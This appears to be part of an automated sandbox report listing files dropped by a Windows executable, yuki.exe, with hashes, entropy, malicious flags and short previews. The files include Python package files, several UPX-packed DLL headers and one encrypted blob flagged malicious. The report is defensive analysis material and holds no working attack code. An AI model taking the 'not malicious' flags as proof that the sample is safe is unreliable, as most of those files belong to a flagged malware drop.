                                                                                                    Preview:__all__ = [.. "IntPointer",.. "MatLike",.. "MatShape",.. "Size",.. "Size2f",.. "Scalar",.. "Point",.. "Point2i",.. "Point2f",.. "Point2d",.. "Point3i",.. "Point3f",.. "Point3d",.. "Range",.. "Rect",.. "Rect2i",.. "Rect2f",.. "Rect2d",.. "Moments",.. "RotatedRect",.. "TermCriteria",.. "Vec2i",.. "Vec2f",.. "Vec2d",.. "Vec3i",.. "Vec3f",.. "Vec3d",.. "Vec4i",.. "Vec4f",.. "Vec4d",.. "Vec6f",.. "FeatureDetector",.. "DescriptorExtractor",.. "FeatureExtractor",.. "GProtoArg",.. "GProtoInputArgs",.. "GProtoOutputArgs",.. "GRunArg",.. "GOptRunArg",.. "GMetaArg",.. "Prim",.. "Matx33f",.. "Matx33d",.. "Matx44f",.. "Matx44d",.. "GTypeInfo",.. "ExtractArgsCallback",.. "ExtractMetaCallback",.. "LayerId",.. "IndexParams",.. "SearchParams",.. "map_string_and_string",.. "map_string_and_int",.. "map_string_and_vector_size_t",.. "map_string
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):344
                                                                                                    Entropy (8bit):4.438685267245838
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:1zBhJDyTH2XE2OTH2XRxEMGMBrMhWcROEoiZAIfH2Xc10F9vSumHcROEoiZWf:1zBHyLkOLejrMYccRIfh0FNSfcct
                                                                                                    MD5:952D77A31C0171AE90C0086AA8E3FCC7
                                                                                                    SHA1:000D22FD5A2545CEFBBF294D63415E82E232820A
                                                                                                    SHA-256:2B16990B35B569AF1CA7239DC10F7B24EC62F27A46626B1E2F1271D2E1AA3554
                                                                                                    SHA-512:36E5BEA12CDF8AE29D737F7062923AE4A1DBDB2C98904F9A35559222119FAFA836C4A7553F5CD9F5639043183155F5E93DFE731EBCF385349A8E4CA72D2E92B6
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:from collections import namedtuple....import cv2......NativeMethodPatchedResult = namedtuple("NativeMethodPatchedResult",.. ("py", "native"))......def testOverwriteNativeMethod(arg):.. return NativeMethodPatchedResult(.. arg + 1,.. cv2.utils._native.testOverwriteNativeMethod(arg).. )..
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):97
                                                                                                    Entropy (8bit):4.601309915764778
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:K2T2QxVLVLLyJRi+gI/aIysi+gIgZPGXV:K2TbTh6JvgMaDR1CV
                                                                                                    MD5:11D506AD07970539A2069E87F488C60E
                                                                                                    SHA1:ECFC23D272E8871943594CDB6A6A9FA6651BCAF9
                                                                                                    SHA-256:1DE383F5662831E69BDDDC21F9D1E4A2A8E806F57F7F69669103DF64D5DB4083
                                                                                                    SHA-512:8E74CFFD8064A6B1406AE250E81F93E6F4860FA72F63E7E0A0AF6F7261327ACD6F0C30B5C0C9DECE33E1481E1774968C8FAA85C52416D114C713DF681EB791AC
                                                                                                    Malicious:false
                                                                                                    Preview:opencv_version = "4.10.0.84"..contrib = False..headless = False..rolling = False..ci_build = True
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1635096
                                                                                                    Entropy (8bit):7.9528782228345625
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:49152:r6H83HeiR86t/czBf6Y1z8kq5HaMpW/9nn3nL/obN1CPwDvt3uFlDCP:r6c3CFFz8BBpWtbU1CPwDvt3uFlDCP
                                                                                                    MD5:63EB76ECCFE70CFF3A3935C0F7E8BA0F
                                                                                                    SHA1:A8DD05DCE28B79047E18633AEE5F7E68B2F89A36
                                                                                                    SHA-256:785C8DDE9803F8E1B279895C4E598A57DC7B01E0B1A914764FCEDEF0D7928B4E
                                                                                                    SHA-512:8DA31FA77EAD8711C0C6FFEDCEF6314F29D02A95411C6AACEC626E150F329A5B96E9FDEAE8D1A5E24D1CA5384AE2F0939A5CC0D58EB8BDBC5F00E62736DCC322
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............l..l..l......l...m..l...i..l...h..l...o..l..m.y.l...m...l...o..l...h.l...l..l......l...n..l.Rich.l.........PE..d......e.........." ...%.0........9.`.O...9...................................R...........`......................................... .P......P.h.....P.......K.d............R..................................... .O.@...........................................UPX0......9.............................UPX1.....0....9..0..................@....rsrc.........P......4..............@..............................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):29968
                                                                                                    Entropy (8bit):7.6778753009761065
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:Pp/6aepjG56w24Up3p45YiSyvkIPxWEqG:1A154spK7SytPxF
                                                                                                    MD5:BE8CEB4F7CB0782322F0EB52BC217797
                                                                                                    SHA1:280A7CC8D297697F7F818E4274A7EDD3B53F1E4D
                                                                                                    SHA-256:7D08DF2C496C32281BF9A010B62E8898B9743DB8B95A7EBEE12D746C2E95D676
                                                                                                    SHA-512:07318C71C3137114E0CFEC7D8B4815FD6EFA51CE70B377121F26DC469CEFE041D5098E1C92AF8ED0C53B21E9C845FDDEE4D6646D5BD8395A3F1370BA56A59571
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........iV...8...8...8..p....8.t9...8.p9...8...9...8.t=...8.t<...8.t;...8.1t<...8.1t;...8.1t8...8.1t:...8.Rich..8.........................PE..d...Sh.c.........." ...".@................................................................`.....................................................................P.......................................................@...........................................UPX0....................................UPX1.....@.......<..................@...UPX2.................@..............@......................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):228120
                                                                                                    Entropy (8bit):7.928690911942244
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:imlccqt6UmyaQeUV1BXKtS68fp2FagXlk2:Z+t6Ce6XKtSHYomk2
                                                                                                    MD5:7E87C34B39F3A8C332DF6E15FD83160B
                                                                                                    SHA1:DB712B55F23D8E946C2D91CBBEB7C9A78A92B484
                                                                                                    SHA-256:41448B8365B3A75CF33894844496EB03F84E5422B72B90BDCB9866051939C601
                                                                                                    SHA-512:ECEDA8B66736EDF7F8E7E6D5A17E280342E989C5195525C697CC02DDA80FD82D62C7FD4DC6C4825425BAE69A820E1262B8D8CC00DBCD73868A26E16C14AC5559
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........>:V.PiV.PiV.Pi_..iX.PiC.QhT.Pi..QhT.PiC.UhZ.PiC.Th^.PiC.ShR.PillQhU.PiV.QiH.PillThf.PillPhW.Pill.iW.PillRhW.PiRichV.Pi................PE..d......e.........." ...%.....P...p...m....................................................`............................................,C......8...............@M...................................................y..@...........................................UPX0.....p..............................UPX1................................@....rsrc....P.......L..................@......................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4942860
                                                                                                    Entropy (8bit):7.9999604225624825
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:98304:Gi/QDzL8whS0qbWYz+6M+gAXi2Afts4ZFm4kqBqTzGk89XVF6N:DQY70qDz+H+gdts4iLGk+i
                                                                                                    MD5:4CCCCDC323A25B9214957A654F0AE919
                                                                                                    SHA1:6F93A6B5A0B32651C0D4E75F74D672673044B208
                                                                                                    SHA-256:8CF115593A843E4C3B110FCC239E5507A95CC5E96EACD0F8D889C86418837332
                                                                                                    SHA-512:4812110B3D0291971F3288F23802B96C77651FE1903C57F68841C0D69FE5EDF1944C7E5A7E4B620193C17F81BBA86D5BA653BE004D9E5A21D3F6D708244B92D5
                                                                                                    Malicious:true
                                                                                                    Preview:.i._`.......x0..}..zAo.Y.nP'7......@sBexT%\.s.I.LwQ....f..m.|z4}..W)0....Q..=.../...!.w.7.|..v....#.....m...).....+.Be.Z..8.9.....V^.&...y`..koTI.U.QZO.6...~..'t.Q.9..:[.&...Ik7y..e..Xq.U..6....-...Lxx.V.....X.?..$3O.f...^.'.O.W......C)..P......9.....fP.....k$..c#,2A.EV..DOb.D..O.O.. ...b.W...V..d!....E0vI\......s.H.)..@I.i....[.1`.[....*.A.$....J..eN..!........b@.0"Sb..E...Ah.`....<.....::..$.....a..hnq5{.q...P..D....g.......*..4......L.V. ...EO._]6.}^.S...3.....D..p.um..s....>..M.3ij..h:4.jNv.0...e..o...0......n$....3{.....{...X.2}.W/x...DG.A`k....{..o.F....+.."..._6.\b...P?..X....P\.../k.81QKa.C4..M...<].....X..K.2..W.s0Kt....+@.z.?..U.-Xb...L.Z...uM....h...E(-.~rU..$..z...gl}..xX..R...n.kK.._N.....M:7.....L.../,]:Pr)..Jx...6%.U..e.%Y4FG.N....6.....%3.............R.......s.....!t#fwA_I...F38....d1.nTj9T...=^.c..)..>...L}..o).5.B....=h.-...?.[p%\.2.r...X.`....$+c..........G_.?..@B..l..j...Y..\.].[:./...,..J..1....X.2..i...
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4
                                                                                                    Entropy (8bit):1.5
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Mn:M
                                                                                                    MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                    SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                    SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                    SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                    Malicious:false
                                                                                                    Preview:pip.
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1523
                                                                                                    Entropy (8bit):5.162397061365918
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:oY3UnzobbOmFTVJcFTzA6GLQrBTP49H432sZEOkHs8nRO632smyxtTfr10VZlQfS:ROmJIJzSEP6H432smp32smEtP10VwHy
                                                                                                    MD5:2F7382E069BEAC97D607124540FD5661
                                                                                                    SHA1:1684541BA4AF5542BA7E6490C25882CA125A1C47
                                                                                                    SHA-256:A7D65D1DD4DCC86DCA5D17D46AA4A1C77669C9B72F55F298E9E2212F2905C0CF
                                                                                                    SHA-512:4BD08A47B9B67098E38895E96136B3A5EE4711DEF8EB6AC87B522F2A024FC7F22EA4B53E048C2BB3F636EA81CD0814B53B4E20361EBC1A8CDE1C8E57F7A76089
                                                                                                    Malicious:false
                                                                                                    Preview:Copyright (c) 2012-2013, Steeve Morin..All rights reserved.....Redistribution and use in source and binary forms, with or without..modification, are permitted provided that the following conditions are met:....1. Redistributions of source code must retain the above copyright notice,.. this list of conditions and the following disclaimer.....2. Redistributions in binary form must reproduce the above copyright notice,.. this list of conditions and the following disclaimer in the documentation.. and/or other materials provided with the distribution.....3. Neither the name of Steeve Morin nor the names of its contributors may be.. used to endorse or promote products derived from this software without.. specific prior written permission.....THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"..AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE..IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE..ARE DISCLAIMED.
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3758
                                                                                                    Entropy (8bit):5.092767270997029
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:DdPHo8lGovhSaWMqCBAInB8fhfxF914CAXTzbIYB/HF4s1LWlAjC:tHoczVBAu6fhft15AzjlLLC
                                                                                                    MD5:3D855AD86A99255B3248D88C524148FC
                                                                                                    SHA1:1ADBA31F74CC4BA33AD9AE31EE29CABA66EB4D93
                                                                                                    SHA-256:612E3D4394DFDCA3E93C74FF02ABC012757279F7BA879D875BEE58F643A45FFE
                                                                                                    SHA-512:99E0C5E2DD734CBB653FDFC80C8F568EEEFAAAEF83BA92431DCE97770077759A0550FA6FC58EC3F86C67774CA9F02C0EC33164B4471DB2D659202979C868A4EF
                                                                                                    Malicious:false
                                                                                                    Preview:Metadata-Version: 2.1..Name: lz4..Version: 4.3.3..Summary: LZ4 Bindings for Python..Home-page: https://github.com/python-lz4/python-lz4..Author: Jonathan Underwood..Author-email: jonathan.underwood@gmail.com..Classifier: Development Status :: 5 - Production/Stable..Classifier: License :: OSI Approved :: BSD License..Classifier: Intended Audience :: Developers..Classifier: Programming Language :: C..Classifier: Programming Language :: Python..Classifier: Programming Language :: Python :: 3.8..Classifier: Programming Language :: Python :: 3.9..Classifier: Programming Language :: Python :: 3.10..Classifier: Programming Language :: Python :: 3.11..Classifier: Programming Language :: Python :: 3.12..Requires-Python: >=3.8..License-File: LICENSE..Provides-Extra: docs..Requires-Dist: sphinx >=1.6.0 ; extra == 'docs'..Requires-Dist: sphinx-bootstrap-theme ; extra == 'docs'..Provides-Extra: flake8..Requires-Dist: flake8 ; extra == 'flake8'..Provides-Extra: tests..Requires-Dist: pytest !=3.3.0 ;
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:CSV text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1224
                                                                                                    Entropy (8bit):5.864447015819705
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:on/2zDBvNGAt5OjUyWovNKl1xp+IkEk02AJYvkPnqxv3X54nHkfIHx+8lFc:onuXBZqjUhoYllz2EYkqxvH54nEIHx+b
                                                                                                    MD5:8EE5353C4ED3152978D14C211C1C90D0
                                                                                                    SHA1:8477996A7FE941A631130210CDD867E6EA4F1646
                                                                                                    SHA-256:E2B6815BD403B74F895406DEE860476FD4621E35E9D777339ABC35790D781903
                                                                                                    SHA-512:B07AC600CE05C189DC8046E3C8B0670EB2077E75C46F51950832D3A15480AD1BBFEE21D6F1935881A915848C28247248809160024F85090610574F0034A957D1
                                                                                                    Malicious:false
                                                                                                    Preview:lz4-4.3.3.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..lz4-4.3.3.dist-info/LICENSE,sha256=p9ZdHdTcyG3KXRfUaqShx3ZpybcvVfKY6eIhLykFwM8,1523..lz4-4.3.3.dist-info/METADATA,sha256=YS49Q5Tf3KPpPHT_AqvAEnVyefe6h52HW-5Y9kOkX_4,3758..lz4-4.3.3.dist-info/RECORD,,..lz4-4.3.3.dist-info/WHEEL,sha256=j9Aissza3750LQHFAQyYerNjmkEON1-8w_RaZNFtKSs,102..lz4-4.3.3.dist-info/top_level.txt,sha256=cX6_gxFUdNSo40TfxrGpTCgu7epGm3yW3m2k7irTDzI,4..lz4/__init__.py,sha256=e_8j-K4TJx38qcPNjoZP_pNDo8IpE4D2ZWl4p50iV_8,646..lz4/__pycache__/__init__.cpython-312.pyc,,..lz4/__pycache__/version.cpython-312.pyc,,..lz4/_version.cp312-win_amd64.pyd,sha256=pf0T86uIXfC3BI9klNDa090G8IhnHUyUA-7-vDpS__g,11264..lz4/block/__init__.py,sha256=DSUbS7zMlKKeLs8JO9riOBO5Q_lVoSB-nwgjfhBeXt0,71..lz4/block/__pycache__/__init__.cpython-312.pyc,,..lz4/block/_block.cp312-win_amd64.pyd,sha256=9A0-u2n4DK7cJlvfzF341GOXgtNdxLzq9qwHDw7q6zQ,76800..lz4/frame/__init__.py,sha256=ZnJ4sJ1HStPpmJpo0q_CGm9fDEui3Tt3V8DmMi68SZM,
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):102
                                                                                                    Entropy (8bit):5.04607660227275
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:RtEeX7MWcSlVlbY3KgP+tkKc9nkLn:RtBMwlVCxWKLnkLn
                                                                                                    MD5:E7BF0F6A4CFAC67DCD90C0088CC32E00
                                                                                                    SHA1:50D74926EE6E3D3025A2033683E5CFD56BEDECDE
                                                                                                    SHA-256:8FD022B2CCDADFBE742D01C5010C987AB3639A410E375FBCC3F45A64D16D292B
                                                                                                    SHA-512:2F587ECE802952038556AFD14FAF26F51F608521C569BC02A08B8E66428317178A7B94CA97A43A0E067FDA5762CD158FF872C06CF38292E14DD86F9B2A9326ED
                                                                                                    Malicious:false
                                                                                                    Preview:Wheel-Version: 1.0.Generator: bdist_wheel (0.42.0).Root-Is-Purelib: false.Tag: cp312-cp312-win_amd64..
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4
                                                                                                    Entropy (8bit):2.0
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:fn:f
                                                                                                    MD5:194B36A8466E4650490040D599B09C0E
                                                                                                    SHA1:4CB4A2C46E9892B8A712716F9B42537D1962BBB4
                                                                                                    SHA-256:717EBF83115474D4A8E344DFC6B1A94C282EEDEA469B7C96DE6DA4EE2AD30F32
                                                                                                    SHA-512:C55B2D3D46EC558533B4019DFFA87B1F93E7866DBCDE8D00243D8C54F1A3094933256BD25EAA0333D6EC4B308F1A4C92630BBEF6E10BE7892774DCCF5556FE77
                                                                                                    Malicious:false
                                                                                                    Preview:lz4.
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9728
                                                                                                    Entropy (8bit):6.690181416544674
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:x4VS9DzxLRsv2B6Qp8kYj273QJXpHcX/:xAotLt6Qp8Za7gJXaX
                                                                                                    MD5:2792ECC8FD33E03D84A8554DC8518DB4
                                                                                                    SHA1:89465011321F5CECDAD86E6F835AA1D8D0AD13D2
                                                                                                    SHA-256:36C5354B5F4DD1BC66EBBC73474BD9D663662769833045735EC6751A3BF69D76
                                                                                                    SHA-512:1C65466454AE5DA134D7CD59D663D82CFF87E95FA8060BEFA9AA82A3793DBF8A987936DF29B04EC5B0BE42CFA8AF16F18B3E7C4C7B7B5C6BF03A042B8070C879
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Y7..8Y..8Y..8Y..@...8Y..GX..8Y.@X..8Y..G\..8Y..G]..8Y..GZ..8Y.7EX..8Y..8X..8Y..Q..8Y..Y..8Y.....8Y..[..8Y.Rich.8Y.........................PE..d....A.e.........." ...%. .......p........................................................`.........................................D...`......T............@..........................................................@...........................................UPX0.....p..............................UPX1..... ..........................@....rsrc................"..............@..............................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):33280
                                                                                                    Entropy (8bit):7.815191385594917
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:Aq57x9FN0In5q6c/aU3GTkSND7/p6ChOAnNAp7X:Aqlxf2eQ2DLOU4X
                                                                                                    MD5:3343D0B8C531B780B2A6B3CDA19D7B7F
                                                                                                    SHA1:BDB760D25D3D9DA136901F43D505493159FE4FD7
                                                                                                    SHA-256:53B59145C034E9374B29CDB2A9901D6591670B42306B4AB97A89E671E0F5E775
                                                                                                    SHA-512:84F76063D2BD413717BA1C247682A7F2845F87BC19048ADAD532FF79E7CABF687848356D9A9B82781ACCA5843C425DA4C0E52691BEE8065787BE7D7A6D0F76FC
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r?Xk6^686^686^68?&.80^68#!794^68}&794^68#!39:^68#!29>^68#!592^68.#795^686^78.^68..>95^68..697^68...87^68..497^68Rich6^68................PE..d....A.e.........." ...%......... ..p....0................................................`............................................\...................P..P...........4.......................................p...@...........................................UPX0..... ..............................UPX1.........0...z..................@....rsrc................~..............@......................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3834880
                                                                                                    Entropy (8bit):7.978797601932288
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:98304:hWzZtBVma9uZoFS5g9HrkpIu2NG1tA7os7SdeFZ:hWtvVVjF0g5AwcvA7osOdC
                                                                                                    MD5:4CC650D9F8C13FCEB1820D0EF9B7801B
                                                                                                    SHA1:B23BF714E99A9A6C52F72BB753B74CD525B86AF3
                                                                                                    SHA-256:DCD3779157989139D632B7D3F86736B00DEA215076755089C8D7F13955BE5E96
                                                                                                    SHA-512:6224CCC34E6D6DB9CE1A8DCBC9236D88793306FF57B722579348D53CF93B319F81C1998AF48A2AD3FD12843D8070A5E7925DCCC787160D73AB44CE77A08EAFFE
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......f..........."...$.06..`........6.....................................p:...........`... .......................................6.DO....6...............0..#...........c:...............................6.(...................................................UPX0....................................UPX1.....06.......6.................@...UPX2.....`....6..T...06.............@...4.24.UPX!.$........Z...5.~ 6..J5........$#=...'..^F.;.JQA.5..]......:,'TE|-..u.}.......l...Z0...+|^..n....'...-...)..>.....t.....&...Cgi...9h.0.!...K....*..R...%..V...3.........v....f. .HSi?....H..E.......+..../..NA.....m.&!.I&'.Z........(..U..w..>.r..k...Z...+.8&.E...J...&.3H.P.N"/s":..X....T.xM....z..A...F.....u..IF...kZ..4)..."..&..h...,...zJ...3..S..Gg.M.a.D4K....<......;C..m.../.z.+..R...adp.F..8.i...e`.Z.q.\.'....5{...b.(.:.H>?.}.........B.V3.....".r..D
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):585384
                                                                                                    Entropy (8bit):6.565977665822063
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12288:SSTTigI46Bb3SUPvRgrKtzL4oaQEKZm+jWodEEVPLwtQi:SUStZaQEKZm+jWodEE9CQi
                                                                                                    MD5:4DC9DA003ED0E3E9E7CFF3B1109470E3
                                                                                                    SHA1:55A06DD5DBB0FE4E4762F1871903134EDD3EC7A4
                                                                                                    SHA-256:66FA570BD6B879AA491F6E45A3E576C3EC7F5FE31ED0EBA8B7D81F88C3B01680
                                                                                                    SHA-512:BDCA95ECB2BE5A5E14C650E8776914DAB60D277E923F3CAFC56B77C3D8055C72B2DDC45D8B3EF1B5BD8D9F52BA097C595AD25E07AB847B6CFEFF9858C5D6A42A
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........)...H...H...H...0...H...0...H...H...H......H......H......H....._H......H....w..H......H..Rich.H..................PE..d...c/..........." ...(.6...X......0.....................................................`A.........................................2..h...X...,............p.. :...v...x..............p...........................`...@............P..x............................text....4.......6.................. ..`.rdata.......P.......:..............@..@.data...p8...0......................@....pdata.. :...p...<...,..............@..@.rsrc................h..............@..@.reloc...............l..............@..B........................................................................................................................................................................................................................................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):29696
                                                                                                    Entropy (8bit):7.778765894518238
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:iRprYzXrZOQCMxbPYSZd+AQXDc85NrxpN:ibYzVOziQSZd+A2c8/rx
                                                                                                    MD5:731F7E7BCF284B4A6F40D48941E44DF4
                                                                                                    SHA1:7714BF03D7E27FDA747379005EE2EDCF1519ED2F
                                                                                                    SHA-256:D00ADFB9F3EC9C027462AA5EDA9AADD788804DAACD1BF1532F90AF2DCC70EBF1
                                                                                                    SHA-512:FF2DCF0939FE7F5428490163991820E3784FFC7CA876802063F58FEA065756E791D63759D9480CCFC669DA5205995AFC18143ABEA690F1DE4F55A731093CE15C
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d..................".....p..........0_....................................................`..........................................r.......p............... ...............s......................................0k..8...........................................UPX0....................................UPX1.....p.......n..................@...UPX2.........p.......p..............@...4.24.UPX!.$....w...X.W;..._......I......&".2A.s3...DLN.M...nU....p..~C+..Bg..>aK.g.ca]I@.~.....\.H.l/..D?...T..D.....TW..-QeDK...5.k..^+. 9?.e.........=.~....<o.>y.H..c.^.Y..}|..m2<~O..Skg.(k.m..kG....q......yT.?.% .Q..U..{...}hxD~6d._.3...N...8...d..M9.s^.>u.Ac....A. ...3.:....R......{2...%h...........8t./V.Q.i..w.|.}...5q.....FY.Q|.I.....5...%\....f:...x...SW....<........b..I.[wR....H.^.@..i..>q.<....|F..b.{..t.*H.(W...5.[.d...L......{.D.+..."Q..._..L.CrMf.@.
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):988672
                                                                                                    Entropy (8bit):7.877327743703955
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24576:Fitdo4q/9iR+yVs6l+zvuy8a7vN3TFVTHwi:0tdo4QQg38CDH
                                                                                                    MD5:956819A53FFF2817155618547D8E316B
                                                                                                    SHA1:A2070E3C902F2D348225FDA0B792A139523CD7FA
                                                                                                    SHA-256:CEF9BB3B1F9E345E1F156830E38D8A9EEE0BC7FD65BDE48CDE23DCD8F20ACD27
                                                                                                    SHA-512:EF163C7AF7136B2EB47561048CD33D89E0E2E1F19231C60538C0D71664B1556DC74BDC966810E8287FD023F8201C3A85C4B76885A7F0B97D115A0B5D0596BA90
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."..............3.`pA.. 3..................................@B...........`..........................................4B.t....0B.............. ?.h...........`5B.(............................|A.(....,B.8...........................................UPX0......3.............................UPX1......... 3.....................@...UPX2.........0B.....................@...4.24.UPX!.$....Q..FJ.VA.;P...|?.IQ.\.....AJ...*}Db..*...WK.....j4B.5.....P.A/r....oy..,..9....h......jaP.Tu.+....:^......L].L..r{..36S....N.....F3....a.3...#W...!*.{.....<m.D....p..{..G"...~...+.27Qc+5C"a...V....+}.?4.5..0....t.W....../..}]K.../)N..{~=. Ml.y..;8J...-..h).)......+t,.'.9tJ...6}.d..>.p<Cl~K.Tv..(.5RO.....w.1E.d..@`..L0...I.......P..T.7.OfC .c,..xM.u...P....:..M1..l<GK........0...qI..v..I%e5.".<.....$q....(..1.$.......YQ.DH.kF.....=..5..`..4
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):90112
                                                                                                    Entropy (8bit):7.95798344108863
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:fJoS4tpDyzbGXBPaaR5/6n7eGYNUZC3/QesztRQttvNjxl1s8kL:z4tpDmGXpNR5SiBNUEszMtTjHbk
                                                                                                    MD5:8DCCAC58F02DBF1D8F51EA901E8BB487
                                                                                                    SHA1:672C449DCAEF581F43B8CBC63BEEF4E0E8474C73
                                                                                                    SHA-256:82151403A057AEFA1DE18E8D2F11E080C6DADB737E05269F34BA0307D00B20A6
                                                                                                    SHA-512:66269EC25633EF34C4832C2EF56FE6408AFC9BD7867F33912A3119E3834A05DA011EDB9B6D428A3BF59150A183B7D86EC9951202060A444F7387DA2BF4C4AB04
